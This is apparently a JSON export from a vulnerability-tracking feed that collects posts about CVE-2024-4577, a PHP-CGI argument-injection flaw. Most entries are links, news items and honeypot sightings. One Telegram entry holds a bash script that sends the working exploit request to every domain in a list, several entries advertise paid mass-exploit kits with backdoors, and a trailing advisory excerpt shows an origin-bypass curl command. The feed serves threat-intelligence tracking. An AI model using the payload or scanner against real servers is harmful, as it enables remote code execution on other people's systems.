PHP-CGI.", "creation_timestamp": "2025-03-11T07:56:12.000000Z"}, {"uuid": "1b2d1c99-70f6-447c-9446-a335c77d96df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/thebugbountyhunter/8789", "content": "No Way, PHP Strikes Again! (CVE-2024-4577)\n\nhttps://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/", "creation_timestamp": "2024-06-17T02:34:59.000000Z"}, {"uuid": "a89d6df8-ec97-4b4e-b315-6cef611602d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GhostClanInt/25043", "content": "Tools - Hackers Factory\n\nSmbclient-ng, a fast and user friendly way to interact with SMB shares. \n\nhttps://github.com/p0dalirius/smbclient-ng\n\n5Ghoul - 5G NR Attacks & 5G OTA Fuzzing\n\nhttps://github.com/asset-group/5ghoul-5g-nr-attacks\n\nCVE-2024-4577 PHP CGI Argument Injection\n\nhttps://github.com/11whoami99/CVE-2024-4577/blob/88e8aa48f001d9538418783cb16179e5dfc59769/CVE-2024-4577.yaml\n\nA fuzzer for finding anomalies and analyzing how servers respond to different HTTP headers \n\nhttps://github.com/devanshbatham/headerpwn\n\nA small PoC demonstrating TLS interception on both HTTP1 and HTTP2\n\nhttps://github.com/Costinteo/hook-https\n\nPHP CGI Argument Injection (CVE-2024-4577) Remote Code Execution PoC \n\nhttps://github.com/watchtowrlabs/CVE-2024-4577\n\nA command line tool for extracting machine learning ready data from software binaries powered by Radare2 \n\nhttps://github.com/br0kej/bin2ml\n\nA collection of offensive Go packages inspired by different Go repositories.\n\nhttps://github.com/MrTuxx/OffensiveGolang\n\nHexVPN is a Python script that sets up a VPN connection using Riseup's VPN service. It fetches the necessary client certificates and VPN gateway configurations, measures latency to select the fastest gateway, and updates the configuration file accordingly. \n\nhttps://github.com/HexBuddy/HexVPN\n\n#HackersFactory", "creation_timestamp": "2024-06-11T09:41:28.000000Z"}, {"uuid": "86cca1a3-aaa9-4e49-a935-7dcb716ab9fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2595", "content": "https://github.com/watchtowrlabs/CVE-2024-4577\n\nPHP CGI Argument Injection (CVE-2024-4577) Remote Code Execution PoC\n#github #poc", "creation_timestamp": "2024-06-07T14:07:42.000000Z"}, {"uuid": "b91d23a2-ae88-4292-bfd6-d31662983fdb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/10640", "content": "#exploit\n1. CVE-2024-4577:\nMake PHP-CGI Argument Injection\nhttps://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-vulnerability\n]-> https://github.com/watchtowrlabs/CVE-2024-4577\n\n2. CVE-2024-5171:\nlibaom Video Codec Library Vulnerability\nhttps://issues.chromium.org/issues/332382766", "creation_timestamp": "2024-06-07T19:20:14.000000Z"}, {"uuid": "311741ff-7b16-4ba6-9263-dd8b0dcbda63", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "https://t.me/CybNux/6847", "content": "\u062b\u063a\u0631\u0629 \u062e\u0637\u064a\u0631\u0629 \u0641\u064a PHP \u0628\u0631\u0642\u0645 CVE-2024-4577 \u0628\u064a\u062a\u0645 \u0627\u0633\u062a\u063a\u0644\u0627\u0644\u0647\u0627 \u0628\u0634\u0643\u0644 \u0646\u0634\u0637\n\n\u0641\u064a \u062b\u063a\u0631\u0629 \u062e\u0637\u064a\u0631\u0629 \u0641\u064a PHP\u060c \u062a\u0645 \u062a\u062d\u062f\u064a\u062f\u0647\u0627 \u0628\u0627\u0644\u0631\u0642\u0645 CVE-2024-4577\u060c \u0648\u0627\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u0628\u062f\u0623\u0648\u0627 \u064a\u0633\u062a\u063a\u0644\u0648\u0627 \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0628\u0634\u0643\u0644 \u0646\u0634\u0637 \u0641\u064a \u0627\u0644\u0628\u0631\u064a\u0629 \u0628\u0639\u062f \u0623\u064a\u0627\u0645 \u0642\u0644\u064a\u0644\u0629 \u0645\u0646 \u0627\u0644\u0625\u0639\u0644\u0627\u0646 \u0639\u0646\u0647\u0627 \u0641\u064a \u064a\u0648\u0646\u064a\u0648 2024. \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0628\u062a\u0623\u062b\u0631 \u0639\u0644\u0649 \u062a\u0646\u0635\u064a\u0628\u0627\u062a PHP \u0627\u0644\u0644\u064a \u0634\u063a\u0627\u0644\u0629 \u0641\u064a \u0648\u0636\u0639 CGI\u060c \u0648\u062e\u0635\u0648\u0635\u064b\u0627 \u0639\u0644\u0649 \u0627\u0644\u0623\u0646\u0638\u0645\u0629 \u0627\u0644\u0644\u064a \u0628\u062a\u0633\u062a\u062e\u062f\u0645 Windows \u0648\u0627\u0644\u0644\u063a\u0627\u062a \u0627\u0644\u0635\u064a\u0646\u064a\u0629 \u0648\u0627\u0644\u064a\u0627\u0628\u0627\u0646\u064a\u0629\u060c \u0648\u0631\u063a\u0645 \u0643\u062f\u0647 \u0645\u0645\u0643\u0646 \u062a\u0623\u062b\u0631 \u0639\u0644\u0649 \u0625\u0639\u062f\u0627\u062f\u0627\u062a \u062a\u0627\u0646\u064a\u0629 \u0643\u062a\u064a\u0631.\n\n\u0641\u0631\u064a\u0642 \u0627\u0644\u0627\u0633\u062a\u062c\u0627\u0628\u0629 \u0644\u0627\u0633\u062a\u062e\u0628\u0627\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646 \u0641\u064a \u0623\u0643\u0627\u0645\u0627\u064a (SIRT) \u0627\u0643\u062a\u0634\u0641 \u0645\u062d\u0627\u0648\u0644\u0627\u062a \u0643\u062a\u064a\u0631\u0629 \u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0641\u064a \u0623\u0648\u0644 24 \u0633\u0627\u0639\u0629 \u0645\u0646 \u0627\u0644\u0643\u0634\u0641 \u0639\u0646\u0647\u0627. \u0627\u0644\u0633\u0647\u0648\u0644\u0629 \u0641\u064a \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u062e\u0644\u062a\u0647\u0627 \u062a\u0646\u062a\u0634\u0631 \u0628\u0633\u0631\u0639\u0629 \u0628\u064a\u0646 \u0627\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u0627\u0644\u0645\u062e\u062a\u0644\u0641\u064a\u0646.", "creation_timestamp": "2024-07-28T13:55:03.000000Z"}, {"uuid": "da81cba5-e274-469a-9c07-d252f709ea26", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://t.me/club31337/2150", "content": "CVE-2024-4577\nArgument Injection in PHP-CGI\n\n\u269c\ufe0f @club1337", "creation_timestamp": "2024-11-11T02:28:51.000000Z"}, {"uuid": "5416e535-cd47-4bc5-a3e6-e3fab798607a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/club31337/2151", "content": "CVE-2024-4577 Argument Injection in PHP-CGI\n\u0414\u041e\u041f\u041e\u041b\u041d\u0415\u041d\u0418\u0415 \u043a \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0435\u043c\u0443 \u043f\u043e\u0441\u0442\u0443\nBASH:\n#!/bin/bash\n\n# Function to check vulnerability for a domain\ncheck_vulnerability() {\n    local domain=$1\n    local response=$(curl -s -X POST \"${domain}/test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input\" \\\n        -H \"User-Agent: curl/8.3.0\" \\\n        -H \"Accept: */*\" \\\n        -H \"Content-Length: 23\" \\\n        -H \"Content-Type: application/x-www-form-urlencoded\" \\\n        -H \"Connection: keep-alive\" \\\n        --data \"\" \\\n        --max-time 10)\n\n    if [[ $response == *\"PHP Version\"* ]]; then\n        echo \"$domain: Vulnerable\"\n    fi\n}\n\n# Main function to iterate over domains\nmain() {\n    local file=$1\n    while IFS= read -r domain || [ -n \"$domain\" ]; do\n        check_vulnerability \"$domain\"\n    done < \"$file\"\n}\n\n# Check if the file argument is provided\nif [ \"$#\" -ne 1 ]; then\n    echo \"Usage: $0 \"\n    exit 1\nfi\n\n# Call the main function with the domain list file\nmain \"$1\"\n\n*\n\u0421\u043e\u0445\u0440\u0430\u043d\u044f\u0439\u0442\u0435 \u0441\u043a\u0440\u0438\u043f\u0442 \u0438 \u043f\u043e \u0441\u043f\u0438\u0441\u043a\u0443 \u0434\u043e\u043c\u0435\u043d\u043e\u0432:\n./CVE-2024-4577_script.sh /path/to/domains-list\n\n#php #xamp", "creation_timestamp": "2024-11-11T02:28:51.000000Z"}, {"uuid": "3c09079b-6ee7-4f47-918b-9b8270c735d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/club31337/2173", "content": "https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/\n\n\u269c\ufe0f @club1337", "creation_timestamp": "2024-11-11T02:28:52.000000Z"}, {"uuid": "15505589-2bce-49ab-8288-4b584676e0e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://t.me/HackerInvestigationZone/9", "content": "\ud83d\udea8_CvEploiterv2 x xWPv3 Ultimate/Beast Software\n\n\ud83c\udfafThe most advanced software for CV 2024 expl0its and WordPress vulnerabilities\n\u00a0\u00a0\u00a0\u00a0 with the latest version/method.]\n\n\u2699\ufe0fCVE-2024-38761 - Wordpress [Zephyr Project Manager] < Unauthenticated Information Exposure.\n\n \u2699\ufe0fCVE-2024-38759 - Wordpress [Search & Replace] < Unauthenticated PHP Object Injection.\n\n\u2699\ufe0fCVE-2024-6313 - Wordpress [Gutenberg Forms] < Unauthenticated Arbitrary File Upload.\n\n\u2699\ufe0fCVE-2024-6164 - Wordpress [Filter & Grids] < Unauthenticated Local File Inclusion.\n\n\u2699\ufe0fCVE-2024-40348 - \n[Bazarr] < Unauthenticated Arbitrary File Read.\n\n\u2699\ufe0f#CVE-2024-4295 - Wordpress [Email Subscribers by Icegram Expres] < Unauthenticated SQL Injection via Hash.\n\n\u2699\ufe0fCVE-2024-4577 - PHP [CGI] < Unauthenticated Command Injection.\n\n\u2699\ufe0fCVE-2024-4836 - [Edito CMS] < Unauthenticated Sensitive Data Leak.\n\n\u2699\ufe0fCVE-2024-32399 - RaidenMAILD [MailServer] < Unauthenticated Path Traversal.\n\n#Investigation_of_hacking \n#Cyber_Security_News\n#codeb0ss", "creation_timestamp": "2024-11-12T20:45:56.000000Z"}, {"uuid": "95f97eda-029e-4cf7-84c8-78ba9e077127", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/NkVsJwhEHY7Sz4p3tErk4hCLFH2cfEz-1UbnqOUzASXcXA", "content": "", "creation_timestamp": "2024-10-29T14:19:49.000000Z"}, {"uuid": "b9463be0-8ce6-4880-b5c1-e78b4b25af15", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "https://t.me/oxlogs/30", "content": "\ud83d\udcccMirTu V3 - Mass MultiCMS Exploitor \ud83d\udccc\n\nFeatures:\u2705\n   \ud83d\udcdb22+ Exploits.\ud83d\udd34\n   \ud83d\udcdb13+ Backdoors ready to deploy.\u2705\n   \ud83d\udcdbAccurate Finder to locate vulnerabilities with precision.\ud83c\udf00\n   \ud83d\udcdbBest Paths for Shell/Backdoor/Uploaders.\ud83d\udca5\n   \ud83d\udcdbPrivate Shell Exploit-Method added for exclusive access.\u2744\ufe0f\n\n\ud83d\udc8eIncluded Exploits are similar to :\ud83d\udc8e\n   \ud83d\udd25CVE-2024-31210 \ud83d\udfe1\n   \ud83d\udd25File Manager Pro Plugin \ud83d\udca5\n   \ud83d\udd25CVE-2024-4577 \ud83c\udf00\n   \ud83d\udd25WooCommerce Payments Plugin \ud83c\udfa4\n   \ud83d\udd25WP File Manager Plugin \ud83d\udd50\n   \ud83d\udd25Popup Builder Plugin \ud83d\udca5\n   \ud83d\udd25Revolution Slider Plugin \ud83d\udca0\n   \ud83d\udd25WordPress 6.3.2 Core \u23f0\n   \ud83d\udd25Newsletter Plugin \ud83c\udf4f\n   \ud83d\udd25WP E-Signature Plugin \ud83d\udc53\n   \ud83d\udd25Advanced Custom Fields Plugin \ud83e\uddb6\n   \ud83d\udd25Duplicator Plugin \ud83e\udec1\n   \ud83d\udd25Elementor Pro Plugin \ud83d\udeb6\u200d\u2642\ufe0f\n   \ud83d\udd25WP Fastest Cache Plugin \ud83c\udf9f\n   \ud83d\udd25Slider Revolution Plugin \ud83d\udc83\n   \ud83d\udd25Contact Form 7 Plugin \ud83e\udde9\n   \ud83d\udd25WP Database Reset Plugin \ud83d\ude36\u200d\ud83c\udf2b\ufe0f\n\n\u26a0\ufe0fPerformance:\u26a0\ufe0f\n   \u2604\ufe0f Very Fast Requests - optimized for speed.\ud83c\udf00\n   \u2604\ufe0f Optimized Threading for seamless operation.\ud83c\udf00\n   \u2604\ufe0f Low CPU/RAM Usage - efficient and effective.\ud83e\udd14\n\n\ud83d\udc8eIt isn't subscription based its LifeTime Edition\ud83d\udc8e\n\n    Price:\ud83d\udcb2\ud83d\udcb2\n\nFor Purchase Contact: @Alace_bot\u2705", "creation_timestamp": "2025-01-26T16:15:20.000000Z"}, {"uuid": "9ffe69ee-7040-426d-8208-eef0e5293b7f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/oxlogs/14", "content": "CVE     : CVE-2024-4577\n  Exploit : PHP CGI Argument Injection\n  Channel : t.me/oxlogs\n  Tool : t.me/oxlogs/13", "creation_timestamp": "2024-11-17T02:11:50.000000Z"}, {"uuid": "4f9da1cd-2d4b-4b46-a4f7-92c39125c80b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-29)", "content": "", "creation_timestamp": "2026-04-29T00:00:00.000000Z"}, {"uuid": "3c94c469-230a-4834-a63e-b081da39592f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://t.me/sysodmins/22651", "content": "\u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u044f\u0437\u044b\u043a\u0435 PHP \u2328\ufe0f\n \n\u041a\u0438\u0431\u0435\u0440\u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u0438\u043a\u0438 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u043d\u0435\u0434\u0430\u0432\u043d\u043e \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u043d\u0443\u044e \u0432 \u044f\u0437\u044b\u043a\u0435 PHP \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2024-4577. \u0415\u0434\u0438\u043d\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0435 \u0443\u0441\u043b\u043e\u0432\u0438\u0435 \u2013 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u044f\u043f\u043e\u043d\u0441\u043a\u0438\u0445 \u0438\u043b\u0438 \u043a\u0438\u0442\u0430\u0439\u0441\u043a\u0438\u0445 \u0440\u0435\u0433\u0438\u043e\u043d\u0430\u043b\u044c\u043d\u044b\u0445 \u043d\u0430\u0441\u0442\u0440\u043e\u0435\u043a \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0433\u043e \u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441\u0430. \u00ab\u0411\u0430\u0433\u00bb \u043f\u043e\u043b\u0443\u0447\u0438\u043b \u043e\u0446\u0435\u043d\u043a\u0443 \u0443\u0433\u0440\u043e\u0437\u044b 9,8 \u0431\u0430\u043b\u043b\u0430 \u043f\u043e \u0434\u0435\u0441\u044f\u0442\u0438\u0431\u0430\u043b\u043b\u044c\u043d\u043e\u0439 \u0448\u043a\u0430\u043b\u0435 CVSS. \u0421\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u044b \u043e\u0442\u043c\u0435\u0442\u0438\u043b\u0438, \u0447\u0442\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u00ab\u043d\u0435\u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e\u00bb \u043f\u0440\u043e\u0441\u0442\u0430 \u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445 \u043f\u043e\u0434 Windows\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u0435\u0442 \u0432 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 PHP 8.1.*, 8.2.* \u0438 8.3.*. \u0418\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0443\u0436\u0435 \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u044b, \u0438 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u044b\u043c\u0438 \u0441\u0447\u0438\u0442\u0430\u044e\u0442\u0441\u044f \u0432\u0435\u0440\u0441\u0438\u0438 \u0441 \u0438\u043d\u0434\u0435\u043a\u0441\u0430\u043c\u0438 8.1.29, 8.2.20 \u0438 8.3.8.\n\n\u0422\u0438\u043f\u0438\u0447\u043d\u044b\u0439 \ud83e\udd78 \u0421\u0438\u0441\u0430\u0434\u043c\u0438\u043d", "creation_timestamp": "2024-07-31T01:42:56.000000Z"}, {"uuid": "374da6ac-8066-4a3e-bbdc-2cddc6210e8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-05-18)", "content": "", "creation_timestamp": "2026-05-18T00:00:00.000000Z"}, {"uuid": "785ec03c-15de-4e0b-9d25-4a778616fd89", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-05-21)", "content": "", "creation_timestamp": "2026-05-21T00:00:00.000000Z"}, {"uuid": "bd92b7e8-825b-45cc-9b8d-cecf125cc573", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/jame-porter-bgs.bsky.social/post/3mmhv2ihfaa2g", "content": "https://www.ipa.go.jp/security/security-alert/2024/alert_20240705.html\n\u203b\u3053\u306e\u8106\u5f31\u6027\u306b\u3064\u3044\u3066\u3001Debian\u3067\u306e\u5bfe\u5fdc\u306f\u3053\u3061\u3089\u2026\nhttps://security-tracker.debian.org/tracker/CVE-2024-4577", "creation_timestamp": "2026-05-22T21:31:37.441614Z"}, {"uuid": "10ac89e6-2b27-43f4-a800-e08f7fbf432b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-05-31)", "content": "", "creation_timestamp": "2026-05-31T00:00:00.000000Z"}, {"uuid": "675d7cd9-f10f-4b7d-826c-4cde186ae5c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-06-18)", "content": "", "creation_timestamp": "2026-06-18T00:00:00.000000Z"}, {"uuid": "e4ad3c32-e440-4bec-be75-9068b33f58ed", "vulnerability_lookup_origin": "caeb2787-0d58-4236-9039-7c86c3e566f3", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/19c4bd12-9e67-4865-a7bb-91daf135dc99", "content": "", "creation_timestamp": "2026-06-19T12:46:39.192601Z"}, {"uuid": "82ddbd8f-be8a-4ff6-835f-659ba5971cbf", "vulnerability_lookup_origin": "caeb2787-0d58-4236-9039-7c86c3e566f3", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/c6109d53-1111-4e52-957f-15423e47e468", "content": "", "creation_timestamp": "2026-06-23T14:05:54.534647Z"}, {"uuid": "5f8d092e-ad93-4d19-90d5-6025cacd83b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://gist.github.com/ivanys2244-sys/cd3c2a40e041f4b33eddc1479dd0d4f9", "content": "# Security Advisory \u2014 Target E-commerce Platform\n\n> **Note:** This is an anonymized sample report for portfolio purposes. All identifying information (domain, IP addresses, third-party service names) has been replaced with placeholders. The original report was sent to the affected vendor through responsible disclosure channels.\n\n## Summary\n\nPassive security assessment of a Russian-language e-commerce platform running behind a two-layer WAF (Cloudflare + DDoS-Guard). The platform sells in-game currency and ranks for a Minecraft server. The backend is hosted on shared infrastructure and runs a customized SaaS shopping cart (EasyDonate) on top of OctoberCMS.\n\n**16 findings identified** during passive reconnaissance:\n- **3 HIGH** \u2014 outdated PHP version, missing security headers, origin server reachable via DNS bypass\n- **5 MEDIUM** \u2014 cookie security issues, missing authentication on cart mutations, open redirect in SSO handler\n- **6 LOW** \u2014 information disclosure, missing cookie flags\n- **2 INFO** \u2014 operational observations, GDPR considerations\n\n**Critical chain:** outdated PHP 7.4 on origin + DNS resolution bypass = potential RCE if CVE-2024-4577 or CVE-2024-1874 is exploitable on this configuration.\n\n## Architecture\n\n```\nINTERNET \u2500\u25ba HTTPS \u2500\u25ba Cloudflare Edge (203.0.113.10, CF-ASN)\n                    \u2193 HTTPS\n                  DDoS-Guard Proxy (transparent, rate-limit + WAF)\n                    \u2193 HTTPS / unix-socket\n                  ORIGIN SERVER (203.0.113.42)\n                    nginx + PHP 7.4.33 + OctoberCMS + EasyDonate\n                    + Minecraft server :25565 (same host)\n```\n\n## Network reconnaissance\n\n### DNS\n- A: 203.0.113.10 (Cloudflare edge)\n- AAAA: none (no IPv6)\n- NS: jim.ns.cloudflare.com, kay.ns.cloudflare.com\n- MX: none (no mail server)\n- TXT: \"v=spf1 -all\" (strict SPF, prevents spoofing)\n- DMARC: **not configured** (recommendation below)\n\n### Subdomain enumeration\nWildcard A-record `*.target-a.example` resolves to origin IP 203.0.113.42 for all subdomains (admin, dev, git, cp, etc.). This is a reconnaissance shortcut for attackers and a DNS rebinding attack surface.\n\n### Reverse-IP\nThe Minecraft server (203.0.113.42:25565) is on the same physical host as the web application. Compromise of one = compromise of both.\n\n## Findings\n\n### HIGH severity\n\n#### F-001 \u00b7 PHP 7.4.33 (EOL since 2022-11-28)\n\n**CVSS:** 7.5 | **CWE:** CWE-1104 (Use of Unmaintained Third Party Components)\n\n**Evidence:** `X-Powered-By: PHP/7.4.33` header visible when reaching the origin directly.\n\n**Impact:** All PHP 7.4 CVEs are unpatched. Most critical:\n- **CVE-2024-4577** (CVSS 9.8) \u2014 PHP-CGI argument injection \u2192 unauthenticated RCE\n- **CVE-2024-1874** (CVSS 9.4) \u2014 PHP-FPM `SCRIPT_FILENAME` LFI \u2192 RCE\n- Multiple XSS, DoS, information disclosure CVEs\n\nThe site processes payment data, which compounds the risk.\n\n**Remediation:**\n1. Upgrade to PHP 8.3+ (EasyDonate 5.x supports 8.1+)\n2. Test in staging environment before production cutover\n3. Subscribe to PHP security advisories: https://www.php.net/security/\n\n---\n\n#### F-002 \u00b7 Missing critical security headers\n\n**CVSS:** 7.4 | **CWE:** CWE-693 (Protection Mechanism Failure)\n\n**Evidence:** All security headers NOT SET in HTTP responses.\n\n**Missing headers:**\n- `Content-Security-Policy` \u2014 no defense against XSS / inline scripts\n- `X-Frame-Options` \u2014 site can be embedded in iframe (clickjacking on /payment)\n- `Strict-Transport-Security` \u2014 SSL-stripping MITM possible\n- `X-Content-Type-Options` \u2014 MIME-sniffing on uploaded avatars\n- `Referrer-Policy` \u2014 leaks full URL in Referer\n- `Permissions-Policy` \u2014 no restriction on camera/mic/geolocation\n\n**Impact:** Any future XSS vulnerability = full account takeover. Clickjacking on payment forms = financial damage. SSL-stripping = session theft.\n\n**Remediation (nginx):**\n```nginx\nadd_header Strict-Transport-Security \"max-age=31536000; includeSubDomains\" always;\nadd_header X-Frame-Options \"SAMEORIGIN\" always;\nadd_header X-Content-Type-Options \"nosniff\" always;\nadd_header Referrer-Policy \"strict-origin-when-cross-origin\" always;\nadd_header Permissions-Policy \"camera=(), microphone=(), geolocation=()\" always;\nadd_header Content-Security-Policy \"default-src 'self'; script-src 'self' 'unsafe-inline' https://cdn.easydonate-equivalent.example https://cdnjs.cloudflare.com; style-src 'self' 'unsafe-inline' https://cdnjs.cloudflare.com; img-src 'self' data: https:; font-src 'self' https://cdnjs.cloudflare.com; frame-src https://sso-provider.example; connect-src 'self' https://api.easydonate-equivalent.example\" always;\n```\n\n---\n\n#### F-003 \u00b7 Origin server reachable via DNS resolution bypass\n\n**CVSS:** 7.5 | **CWE:** CWE-284 (Improper Access Control)\n\n**Evidence:**\n```bash\n$ curl --resolve target-a.example:443:203.0.113.42 -I https://target-a.example/\nHTTP/1.1 200 OK\nServer: ddos-guard\nX-Powered-By: PHP/7.4.33\n```\n\n**Description:** A simple `--resolve` flag in curl bypasses Cloudflare DNS and connects directly to the origin IP. DDoS-Guard does not block this because the connection appears to come from a legitimate client IP. Attackers can:\n1. Discover origin IP via DNS enumeration (subdomain brute force shows origin for 100+ subdomains)\n2. Bypass Cloudflare security policies (rate limiting, WAF rules, IP geo-blocking)\n3. Reach the origin's PHP 7.4 stack directly (compounds F-001)\n\n**Remediation:**\n1. **Primary:** Migrate origin to **Cloudflare Tunnel** (cloudflared) \u2014 origin has no public IP, only Cloudflare can reach it\n2. **Alternative:** Configure DDoS-Guard to allowlist ONLY Cloudflare IP ranges: https://www.cloudflare.com/ips/\n3. **Quick fix:** Block origin IP from non-Cloudflare sources at the hosting provider firewall\n\n---\n\n### MEDIUM severity (selected)\n\n#### F-004 \u00b7 DDoS-Guard cookies leak client IP\n\nThe `__ddg9_` cookie stores the client IP in plaintext. `__ddg8_` and `__ddg10_` are missing `Secure` and `HttpOnly` flags.\n\n**Remediation:** DDoS-Guard supports cookie hardening options \u2014 enable Secure flag for all cookies.\n\n---\n\n#### F-005 \u00b7 